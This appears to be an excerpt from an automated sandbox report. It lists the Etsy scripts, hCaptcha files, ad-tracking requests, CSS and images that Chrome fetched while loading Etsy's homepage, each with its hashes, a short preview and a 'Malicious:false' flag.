                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (630)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):763
                                                                                                                                                                Entropy (8bit):5.399382805229381
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:7F0C59926C81675548BC34B9808B68EE
                                                                                                                                                                SHA1:B2EECC5E1CDFBE851070056172B14F2BB067150D
                                                                                                                                                                SHA-256:4AA0447802312D77DAD29B030C581D5FB8FD9B0339C3F7FB77F2B5ADDDCDF311
                                                                                                                                                                SHA-512:F1B11A3D5B175806E925FE6F54DBF2D21F98C95F15CA67C217BD9F1C7D8D39CB4E4D42CCAC8F6EB89C8EDDBEEBF62DDD1E87F7F09D9E929E8D5A50F5922E8513
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:(()=>{var e={53260:(e,t,r)=>{e.exports=r(17186)(2678)},8966:(e,t,r)=>{e.exports=r(17186)(6917)},17186:e=>{"use strict";e.exports=etsy_libs_48199a5f98b47a4b8eda}};var t={};function r(o){var s=t[o];if(void 0!==s)return s.exports;var a=t[o]={exports:{}};e[o](a,a.exports,r);return a.exports}(()=>{"use strict";var e=r(8966);var t=r(53260);class o{constructor(){this.clickInit()}clickInit(){document.querySelectorAll("li.homepage_search_bubble").forEach((e=>{e.addEventListener("click",(()=>{t["default"].logEvent({event_name:"Homepage_Vesta_ApiSpec_ContentfulSearchBubbles_click"})}))}))}}(0,e.onWindowLoaded)((()=>{new o}))})()})();.//# sourceMappingURL=https://www.etsy.com/sourcemaps/evergreenVendor/en-US/vesta_homepage/search_bubbles.f7a45b64f71ceccc6f3f.js.map
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (2108)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2304
                                                                                                                                                                Entropy (8bit):5.3591295906892364
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:27779D1602EBE7A35D73B7F5CE2082E2
                                                                                                                                                                SHA1:A17136CD65AEEF931C7826632844613EEA329F73
                                                                                                                                                                SHA-256:5E4D802832B6C90DA27B8DE64C00E68CD7F96B74E12BEC9DF953A488254FF168
                                                                                                                                                                SHA-512:2AE6D10FA8821DB4272D4BC679840A25B5D650B5A740715BCF9A07756B85759FA9DA6A027A1DC83B3EC5C00E24D382948D628EA8E9972DE7C660A82241FAF49D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:"use strict";(self["jsonp-common-entrypoints"]=self["jsonp-common-entrypoints"]||[]).push([[1913],{97635:(e,t,r)=>{r.r(t);r.d(t,{CategoryNavigationLoader:()=>i});var n=r(16310);function a(e,t,r){t in e?Object.defineProperty(e,t,{value:r,enumerable:true,configurable:true,writable:true}):e[t]=r;return e}const s=0;const o={HEADER_WRAPPER:"[data-selector='header-cat-nav-wrapper']",OVERLAY:"[data-ui='overlay']"};class i{constructor(){a(this,"headerWrapper",void 0);this.headerWrapper=document.querySelector(o.HEADER_WRAPPER);this.setUpDarkBackgroundOverlay=this.setUpDarkBackgroundOverlay.bind(this);this.setUpFeaturedNodeBar=this.setUpFeaturedNodeBar.bind(this)}initNavEvents(){return Promise.allSettled([this.setUpFeaturedNodeBar(),this.setUpBreadcrumbsIfEligible(),this.setUpCategoryDropDownMenu(),this.setUpDarkBackgroundOverlay()])}setUpDarkBackgroundOverlay(){const e=document.querySelector(o.OVERLAY);return new Promise((t=>setTimeout((()=>{Promise.resolve().then(r.bind(r,23860)).then((({Overl
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (1913), with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1913
                                                                                                                                                                Entropy (8bit):5.270926464935564
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:0B36C426FF606E7E0B0232F29E202F77
                                                                                                                                                                SHA1:A2277EF22D32443DDEF7EB39FC1F9978CE63D596
                                                                                                                                                                SHA-256:57071AE64A57D1CFD1B2AF89803D0F34C954AE62AF77945B679719E631006683
                                                                                                                                                                SHA-512:056C39F067B5E40D6DBD9668E9DC9593CBFBBE778F3620C405207D60A17035D2AA1734627C0EB24F9EFC623A00891079EDDCD2A82E3BF4A6D534875172CDA2EF
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:var lanternTracker=function(e,t){function n(e){return e?(e^16*Math.random()>>e/4).toString(16):([1e7]+-1e3+-4e3+-8e3+-1e11).replace(/[018]/g,n)}return{doTrack:function(r){r=void 0===r?{}:r,etsy_region=Etsy.Context.data.locale_settings.region.code,etsy_is_eu=Etsy.Context.data.locale_settings.region.is_EU_region,"GB"===etsy_region?r.site="6091":"US"===etsy_region?r.site="6220":"CA"===etsy_region?r.site="6939":"FR"===etsy_region?r.site="7432":"DE"===etsy_region?r.site="7634":"NL"===etsy_region?r.site="9208":"IT"===etsy_region?r.site="9607":"ES"===etsy_region?r.site="10501":"AU"===etsy_region?r.site="10781":"DK"===etsy_region||"FI"===etsy_region||"NO"===etsy_region||"SE"===etsy_region?r.site="8917":!0===etsy_is_eu?r.site="10723":r.site="10690";var i,o,s,a,g,c=t.referrer||"",d=t.referrer.split("/")[2]||"",l=e.location.href||"",_=e.location.hostname||"",y=navigator&&navigator.userAgent?navigator.userAgent:"";if(t.cookie.indexOf("lantern=")>=0);else{var p=n();i="lantern",o=p,(s=60)?((a=new Da
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 300x300, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):12114
                                                                                                                                                                Entropy (8bit):7.983687662515029
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:2E043BD89A891BAE630E1319EA0BC0B9
                                                                                                                                                                SHA1:D2B253FC345A61545CB3A2603D77168C9F6C5F67
                                                                                                                                                                SHA-256:77575542C275297FFBCE3B8D46B107471C7784D93F1B5D00C1F57FD91D16100A
                                                                                                                                                                SHA-512:E34579C24CD40381EDD7E6AF0A1E062CA68A20DDFB23EACB98387A840B5E5B9F1B51FAD37E6D2F9B0D979FAA9D3F2305E223C60CFA3A91579723E65F37E4D1EB
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://i.etsystatic.com/26898518/r/il/d727b9/3193550477/il_300x300.3193550477_cydu.jpg
                                                                                                                                                                Preview:RIFFJ/..WEBPVP8 >/.......*,.,.>E..D.....6.....c/3.....*0A.......Z....==..C.?...j.]...U.q....g../P_....?...z..K.a.a..'.._........._.......?.z....i....K..f...g....k.`.....:..+.'.w.....).w.?.z5._..f.....v........c?..C...o.>....p."..$......x...a..X...R.......=............Z.6..2B.c..<.e...."D.t?.3...t.wsg....F8..vy..j9...5..r`..[..f........<......c-.o.Z/&]..JKj.t.j.(.h.9&HD.{...,.....v..xv./.K..U/..ag.Fp.2.RQC.t.b...+2FHlY.o....9......_V..-.7yidf..z`A7.W.G....,...p..A%R..+....>).&YQ.....t.......7.W..Qa.q..&S..sJ..,..0...%=..M.....}..nR.Dj....$f....@.K...".Xg......C...P...4.;..m.[..Md._..).g.~8......C.;?...*.#m:+K..e...}......9.V"....*Q...a.Z..|..xhJ.@.....u...cn.4..w0..;....,.............U......n.(p4.p.D.i%.OR.0JL. Y!+...<...io.?..}...e..Q..f......Y.S.y...b.T.c.F0*..}N..H...&>.@L..Rl..$..@>.O/....e..%....^.{g=...`j.......:H.".+..(.H.......e.[.JO...F.L...;.....y..,..b...{.....tus.&.-..~.!...B....s......~....M'...5:Q.p&3.-..,.....
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 190x128, components 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):5149
                                                                                                                                                                Entropy (8bit):7.900057852248596
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:6C6B076A13A1D1AC5F5E1647AB25DB06
                                                                                                                                                                SHA1:3DD1C5F3FE6450E3FA2AD50FAA39CA0061F61452
                                                                                                                                                                SHA-256:E6CC0CB67662A9235620EBDDB7298DDD7FEB533345CF340FD8C71D402F8BDBCA
                                                                                                                                                                SHA-512:3D8C3CB3803257F8D7BB47347C69840B3F97744E7BCAC1EC59728DCDDA8AF10C39E6FB13D80973EB40344313CD60B5BB5B7BE2FE66BD0A5B52227E4ADA2114D0
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?........(.......GJ:._.9.?i.......)v......\V%..m ..dYTG++?]...S....+*-.Fc...m?.T........Xn^........s....C..3.!..c...._.t.$.._.......YV..C..T...J.*)........Q.2....A..Vu.........CT....^..b.R.:.j..>.......G.G.....yRs....].o,O..........._g.^....'.Y..Ys.r].1....Q..>7...4).n..A....I...J..G*..i..i..k...T.6.m...7..}Mj..#2...3|.O'.V*X...K.J....&...cA.dU...w...
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 500x250, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):10186
                                                                                                                                                                Entropy (8bit):7.977595412949512
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:85A71DB03A389674B10F5A6484C07502
                                                                                                                                                                SHA1:9A4EECC7858B99A118F74C9E7FBC921059924970
                                                                                                                                                                SHA-256:E3525D9C048303B3DCE59775485B466AF0EB5F4A190031D8A412A4C5EDD7F5D1
                                                                                                                                                                SHA-512:89855E2E66B2805B3D5C168F5C5B6378176C22BB13D213D66A2CC6B54A06AE9127F29D793B79CE59B682B8F382E5B1E3711439FD355F7BC239BCE95B1154BDA9
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://i.etsystatic.com/ij/8784c8/6319341898/ij_fullxfull.6319341898_boutu25q.jpg?version=0
                                                                                                                                                                Preview:RIFF.'..WEBPVP8 .'.......*....>=..E"!..[,. ...%..~..O.....u..y..}.G.t.I..9..G..;...z;.?.O_[.|...z.zW...........'.......K.Q............C}{.M.O..........:.._..........oHO..+./........|K?......O./._...........?..._.>...l..{.~.....IL>....b..T......%..-.u...@..S.......e.....3..1.:...-:j......I6e./~0'3..V......>.l.W.$......Vov.C.[.i...u.U.E.}...)..7 ;.9g...M..K..M|..b...L$...ge.'.(.../.m.*.-..Jhj.=.<>sv).r6.x(o1......)..#.c..&.\ud.N..~.....'i./Y.......A....X{..<f{.~.W..T?.n......Xc.JH.g.....M..]&ps....... ../..<..O.....v%&2..b$`.#.#:.D..d..B......n$5X.........^.{K......4..oj.i.....XM.AT_f#.R...9i!...Qh....W:.u*r.v6.......@N_6..v7.waZ%..=.....g...H....{...W^......7..f.v.V=Q...K.G.OX..>/.W.9...T[.~5...8...........e $XEmB{z.j.v..4M..{......N......(..T../N(........L...V.....*.X.Y....0.{......4H.f..s...Yz....0.wnm...k.TC.%.. PqnF=....v\.=.......nU.S.{.X.:3.-...'.E.Z.Rj} ..>...;,....}...].v|.w..~.;x.w..'P.UK.)...Y.i.Y..g7o....9....8.0.f.......gy.w. .
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (65501)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):78514
                                                                                                                                                                Entropy (8bit):5.789092451478665
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:6FF4D76AA69AADDDF89F47B161C12899
                                                                                                                                                                SHA1:A89B013E0AF6DFC73FDE82DD89EE12185F5F29E1
                                                                                                                                                                SHA-256:8E5B248540F13C600F0431AD153FF15746EB58419F0B809A7F66C9C868456318
                                                                                                                                                                SHA-512:9A7C10E69A31E1421D3CF05978B38548ADC228B40C46F0BAB67003CCF2D1C1E875E61BCE317A9A13DA30ADD471A137D04E90DA32BC2EE84928520E09D844C78B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:/* https://hcaptcha.com/license */.var image_label_area_select=function(t,i,e,s,o,n,h,a,r){"use strict";function l(){i.Extend.self(this,i.DomComponent,"example-image"),this.width=0,this.height=0,this._image=null,this._visible=!1,this.$image=this.createElement(".image")}function p(){i.Extend.self(this,i.DomComponent,"bounding-box-example"),this.width=0,this.height=0,this._visible=!1,this.$container=this.createElement(".example-wrapper")}function c(){i.Extend.self(this,i.DomComponent,"challenge-prompt"),this.state={locales:null},this.width=0,this.height=0,this._visible=!1,this.$copy=this.createElement("h2",".prompt-text"),this.$block=this.createElement(".prompt-block")}s=s&&Object.prototype.hasOwnProperty.call(s,"default")?s["default"]:s,n=n&&Object.prototype.hasOwnProperty.call(n,"default")?n["default"]:n,i.Extend.proto(l,i.DomComponent),l.prototype.style=function(t,i){this.css({width:t,height:i,borderRadius:4,right:0,top:0,position:"absolute",overflow:"hidden"}),this.$image.css({opacit
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 500x333, components 3
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):52677
                                                                                                                                                                Entropy (8bit):7.970192165457578
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:4676E8E58D91F06A2B05C2472389617F
                                                                                                                                                                SHA1:DDC3EAF5D875630CC3F1950281E766C70B4D17F6
                                                                                                                                                                SHA-256:95B04729E293F8FFE3090BCCDA84D8708F3985FD73D8695B886A87D2AF706526
                                                                                                                                                                SHA-512:26E9ADD8CAA4B4654278C37FAB59838CE98A2B3F60A6BA08920378A4441BA15CB6E80E2CC9A7AD7B3C0262DA2AE0007371AB7D656298B7F13A0D009FC685EC2A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://imgs3.hcaptcha.com/tip/76efba880659c21cd6cc12f904742a7f2923b38d45f6678e6840b4c7be6a0d2e/272a2489fbb2258de74d743021d0965bb0ba64145c0d018a8ba4f8d5392b53c2.jpeg
                                                                                                                                                                Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......M...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..%eP..@X.L..vc..}.8.UY...H..q.(.h....y{..G.\c.....duTe].}..........v>..mX.,....u...}.P.W...U}..LgbD..0..U.$..a...}.yp..X=s*..IEv...K+..[O..Bb......Q.9N...2{.Z......;,7j.7..;..,. %.Dm.......Z|.zh.....]eI.$o.>0..F..0...)h..Q.....N....>S...3...l#..nT<...?...?^..D=.*..*.pgq..5.....-Tu.x.\ .I...P.".p..^.wcL...$m...:..I.....Z...Q.E...<.^(]..hH..R.\9!~.p:....
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (5336), with no line terminators
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):5336
                                                                                                                                                                Entropy (8bit):5.929721292074612
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:96025E0EB00ABC91FD287A1D8E40BC7F
                                                                                                                                                                SHA1:2DA71E9E0551574EE006B1B76ED81C4CA1EBBEB7
                                                                                                                                                                SHA-256:9F4C5FADF96560C3E14E2306AFA1E00743D4D7E3077795AD80401559C07728F9
                                                                                                                                                                SHA-512:F82CE8B4812BACC90DFD46551A5DEECC72EFA50436DFE48B8C14FAEAD17AE5D9B33C64354884FAFD6D21245D9EA254A3BD14C6C5B1FB464A74A0C0B05764F694
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://www.googleadservices.com/pagead/conversion/658194373/?random=1728513239082&cv=11&fst=1728513239082&bg=ffffff&guid=ON&async=1&gtm=45be4a70v870186735z86935543za201zb6935543&gcs=G111&gcd=13t3t3t3t5l1&dma=0&tag_exp=101671035~101686685~101747727&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.etsy.com%2F&ref=https%3A%2F%2Fw4.ischievou8.ru%2F&label=XwNfCLSf5dkDEMX_7LkC&hn=www.googleadservices.com&frm=0&tiba=Etsy%20-%20Shop%20for%20handmade%2C%20vintage%2C%20custom%2C%20and%20unique%20gifts%20for%20everyone&value=0&bttype=purchase&npa=0&pscdl=noapi&auid=2111120285.1728513237&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&capi=1&data=ads_data_redaction%3Dfalse&rfmt=3&fmt=4
                                                                                                                                                                Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):399852
                                                                                                                                                                Entropy (8bit):5.088913569365189
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:D92A1E3F459DEAF5B1C900771FB50751
                                                                                                                                                                SHA1:522911C710DE537642DE6A94C43431075AE22CFA
                                                                                                                                                                SHA-256:AAE26E869CE6034E283C2EA07068E95F911476E6E47416B5D70E97836D78CEA0
                                                                                                                                                                SHA-512:BB73DBCED95FB44C77DE7EEC53478C14FEF49CBF90EB8F9E2CE3832138DED6C353939E540325D02CE688C2069C8D8DD278C44FAE65A1512801573EBB4A753EF6
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:"https://www.etsy.com/dac/site-chrome/components/components.bf929359652aae,site-chrome/header/header.202836faf34060,__modules__CategoryNav__src__/Views/ButtonMenu/Menu.8d961c48ba074a,__modules__CategoryNav__src__/Views/DropdownMenu/Menu.202836faf34060,site-chrome/footer/footer.202836faf34060,gdpr/settings-overlay.202836faf34060.css?variant=sasquatch"
                                                                                                                                                                Preview::root{--clg-typography-pal-weight-600:600;--clg-typography-pal-weight-500:500;--clg-typography-pal-weight-400:400;--clg-typography-pal-weight-300:300;--clg-typography-pal-weight-200:200;--clg-typography-pal-family-sans-serif-semibold:"Graphik Webfont","-apple-system","Helvetica Neue","Droid Sans","Arial","sans-serif";--clg-typography-pal-family-sans-serif-medium:"Graphik Webfont","-apple-system","Helvetica Neue","Droid Sans","Arial","sans-serif";--clg-typography-pal-family-sans-serif-regular:"Graphik Webfont","-apple-system","Helvetica Neue","Droid Sans","Arial","sans-serif";--clg-typography-pal-family-serif-regular:"Guardian-EgypTT","Charter","Charter Bitstream","Cambria","Noto Serif Light","Droid Serif","Georgia","serif";--clg-typography-pal-family-serif-light:"Guardian-EgypTT","Charter","Charter Bitstream","Cambria","Noto Serif Light","Droid Serif","Georgia","serif";--clg-typography-pal-family-serif-thin-italic:"Guardian-EgypTT","Charter","Charter Bitstream","Cambria","Noto Serif Th
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 680x540, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):42198
                                                                                                                                                                Entropy (8bit):7.9963438635870325
                                                                                                                                                                Encrypted:true
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:EEA2B396BBA40AE609C62A6139464627
                                                                                                                                                                SHA1:196E792627CC05EED1DB69F3238FE39640235B66
                                                                                                                                                                SHA-256:7F411F3ECAC30649769F8F428D719E391F4F9A28F82DFE98BFCA2C5654697191
                                                                                                                                                                SHA-512:1568EC2CB459D6F005CE6110C765240716216E25CF37E9931904A569563C6D9DD01B9F6558F290E3F123C0187693136CBE7281848CAD74BAB3672EA783E364CC
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://i.etsystatic.com/8774385/r/il/b1c913/565518272/il_680x540.565518272_kfem.jpg
                                                                                                                                                                Preview:RIFF...WEBPVP8 ........*....>=..D.!....:0P..gk.....xO....."x...t......8_].oV.+=....@...t./=C.....U............?....{.......G[.G...w.G.w.......?.w..O...>.._.na.{.w...z../....xo...c.....p}..8}m.....O...?...z......w..........zr.......g...o.....#RpOov..y.JN.,...~w....U..._..r..z..5..-.1.|..?o.*.LK...U......Uu....._....VM..n...fx..)N..C.S.m.yn..F....|..2.q...mw.#..y.O.\Pl<1..O..&"dY.r...4.v....dZ. ...:..O.T....&O..r...........6FN...D.Hh.Ypln0L..^.._.......ZD.)..."i.S.E..8...U...].z.D..L..S> j@.i.:?.?!l..v..u.........._:........;..r.]^c5....R.._...d)......}.{...).D..%.xaj.2...R....M.B7>...[ob.5..i..K~$...f.\...m...H.U).............j..L............_.D...XVp..]r..Vvt.Y......H..Y../......+.....-....,.D...V`.>.bB[...../......|)..[~./..m_.".q...,.0....e./..ha0+.:.F.u.z^,{6L..c.A..e..wc.......!,.#..^..:..q.S.W.N.V2..c^9...kP....WuPS..yJ....j..5er 4..|h.P....._.;P`._R0.s....?....?4...1....j......0p...m?3.....}......A.....=...C.2.1.E3;W..8.....a.MPQ!o
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (6682), with no line terminators
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):6682
                                                                                                                                                                Entropy (8bit):5.6387625209882115
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:59CF24E3E2C76326E30C6013C9273EF4
                                                                                                                                                                SHA1:425857E7BEFCCDA304241A94E1701C019DB22BC6
                                                                                                                                                                SHA-256:0BDB799BB78BEEEE2021E098821BF1003393BC254F6D0AA0BA3EBB4D523E2AFB
                                                                                                                                                                SHA-512:88E8D2066DDDFACCAB406AEEA092BB4158EB6F5F98FD61ED28FD58C51C77C71D8C001A048E7688B1996B6100D1A85BAA76222EFC8AF7AFB2AE750D306DE61E7D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://td.doubleclick.net/td/fls/rul/activityi;fledge=1;src=8666735;type=count0;cat=etsy_000;ord=1;num=3043274380888;npa=0;auiddc=2111120285.1728513237;ps=1;pcor=742816089;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4a70v9189895925z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101529666~101671035~101686685~101747727;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2F?
                                                                                                                                                                Preview:<html><head><meta http-equiv="origin-trial" content="Avh5Ny0XEFCyQ7+oNieXskUrqY8edUzL5/XrwKlGjARQHW4TFRK+jVd5HnDIpY20n5OLHfgU4ku7x48N3uhG/A0AAABxeyJvcmlnaW4iOiJodHRwczovL2RvdWJsZWNsaWNrLm5ldDo0NDMiLCJmZWF0dXJlIjoiUHJpdmFjeVNhbmRib3hBZHNBUElzIiwiZXhwaXJ5IjoxNjk1MTY3OTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0="></head><body><script>var ig_list={"interestGroups":[{"action":0,"expirationTimeInSeconds":46656000,"interestGroupAttributes":{"owner":"https://td.doubleclick.net","name":"1j627963196","biddingLogicUrl":"https://td.doubleclick.net/td/bjs","dailyUpdateUrl":"https://td.doubleclick.net/td/update?ig_name=1j627963196\u0026ig_key=1sMWo2Mjc5NjMxOTY!2sac7u2A!3sAAptDV6rBr9q","trustedBiddingSignalsUrl":"https://td.doubleclick.net/td/bts","trustedBiddingSignalsKeys":["1sUlFZYg!2sac7u2A!3sAAptDV6rBr9q"],"userBiddingSignals":[null,null,1728513240239246],"ads":[{"renderUrl":"https://tdsf.doubleclick.net/td/adfetch/dv3?xfa_adg_id=167413405199\u0026xfa_ads_id=590594853\u0026xfa_cr_id=704040673152\u0026xfa_cv_
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (39933)
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):358510
                                                                                                                                                                Entropy (8bit):5.523131372427568
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:E666C37A3E4ADE453DC0D057B27E3365
                                                                                                                                                                SHA1:76CE7624F884BEAF3AA5570CC45EF067472EE8F4
                                                                                                                                                                SHA-256:FA511A8A78D68366A83CFC8E5E33EF87B5FFA521D001953635D031EEA99D6C0D
                                                                                                                                                                SHA-512:9139055954E8D2C68CEBB6B5A5169C070328B8B7888D0177122E859D048CDDD33F29D45B91FFF3C794FAC16B02200E6A891B11A60EA86F94CBCBF7BA324CA35D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://newassets.hcaptcha.com/captcha/v1/2766c43/static/hcaptcha.html
                                                                                                                                                                Preview:<!DOCTYPE html>.<html lang="en" data-id="hcaptcha-frame-2766c43">.<head>. <title>hCaptcha</title>. <meta charset="utf-8">. <meta http-equiv="X-UA-Compatible" content="IE=edge">. <meta http-equiv="Content-Security-Policy" content="object-src 'none'; base-uri 'self'; worker-src blob:; script-src 'self' 'unsafe-eval' 'sha256-1RDbk230aGzS3/Clwl86spvWPmIu48XoU2xaD9Vn8bE=';">. <style type="text/css">*{-webkit-tap-highlight-color:transparent;-webkit-font-smoothing:antialiased}body,html{margin:0;padding:0;font-family:-apple-system,system-ui,BlinkMacSystemFont,"Segoe UI",Roboto,Oxygen,Ubuntu,"Helvetica Neue",Arial,sans-serif;overflow:hidden;height:100%;width:100%;background-color:rgba(255,255,255,0);background-color:transparent}fieldset{margin:0;padding:15px 20px;border:none}button:focus,input:focus,select:focus,textarea:focus{outline:0}:focus{border:none;outline:0}textarea{border:none;overflow:auto;outline:0;-webkit-box-shadow:none;-moz-box-shadow:none;box-shadow:none;resize:non
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 118x118, segment length 16, progressive, precision 8, 680x540, components 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):67934
                                                                                                                                                                Entropy (8bit):7.986474825938162
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:75BBE0038E173DFB1CD43A212A14257C
                                                                                                                                                                SHA1:3DDC51EE4C4A3FAB40F93BE8BA5E3466A96BCAF6
                                                                                                                                                                SHA-256:AE18FD4342E4EAA5C08C573E678E0005AAF4081D8628B0889C09CD4F56AF5A2C
                                                                                                                                                                SHA-512:D04CC1EEEFC1E3B9963451E1ADBEB8818C3683A62FDC4CB3F353C37A8DACFC2238FD8DAED0A89AD2AE403CA94F65B0AF80E129ACAB55478F3EE28BED9CF2D6E0
                                                                                                                                                                Malicious:false
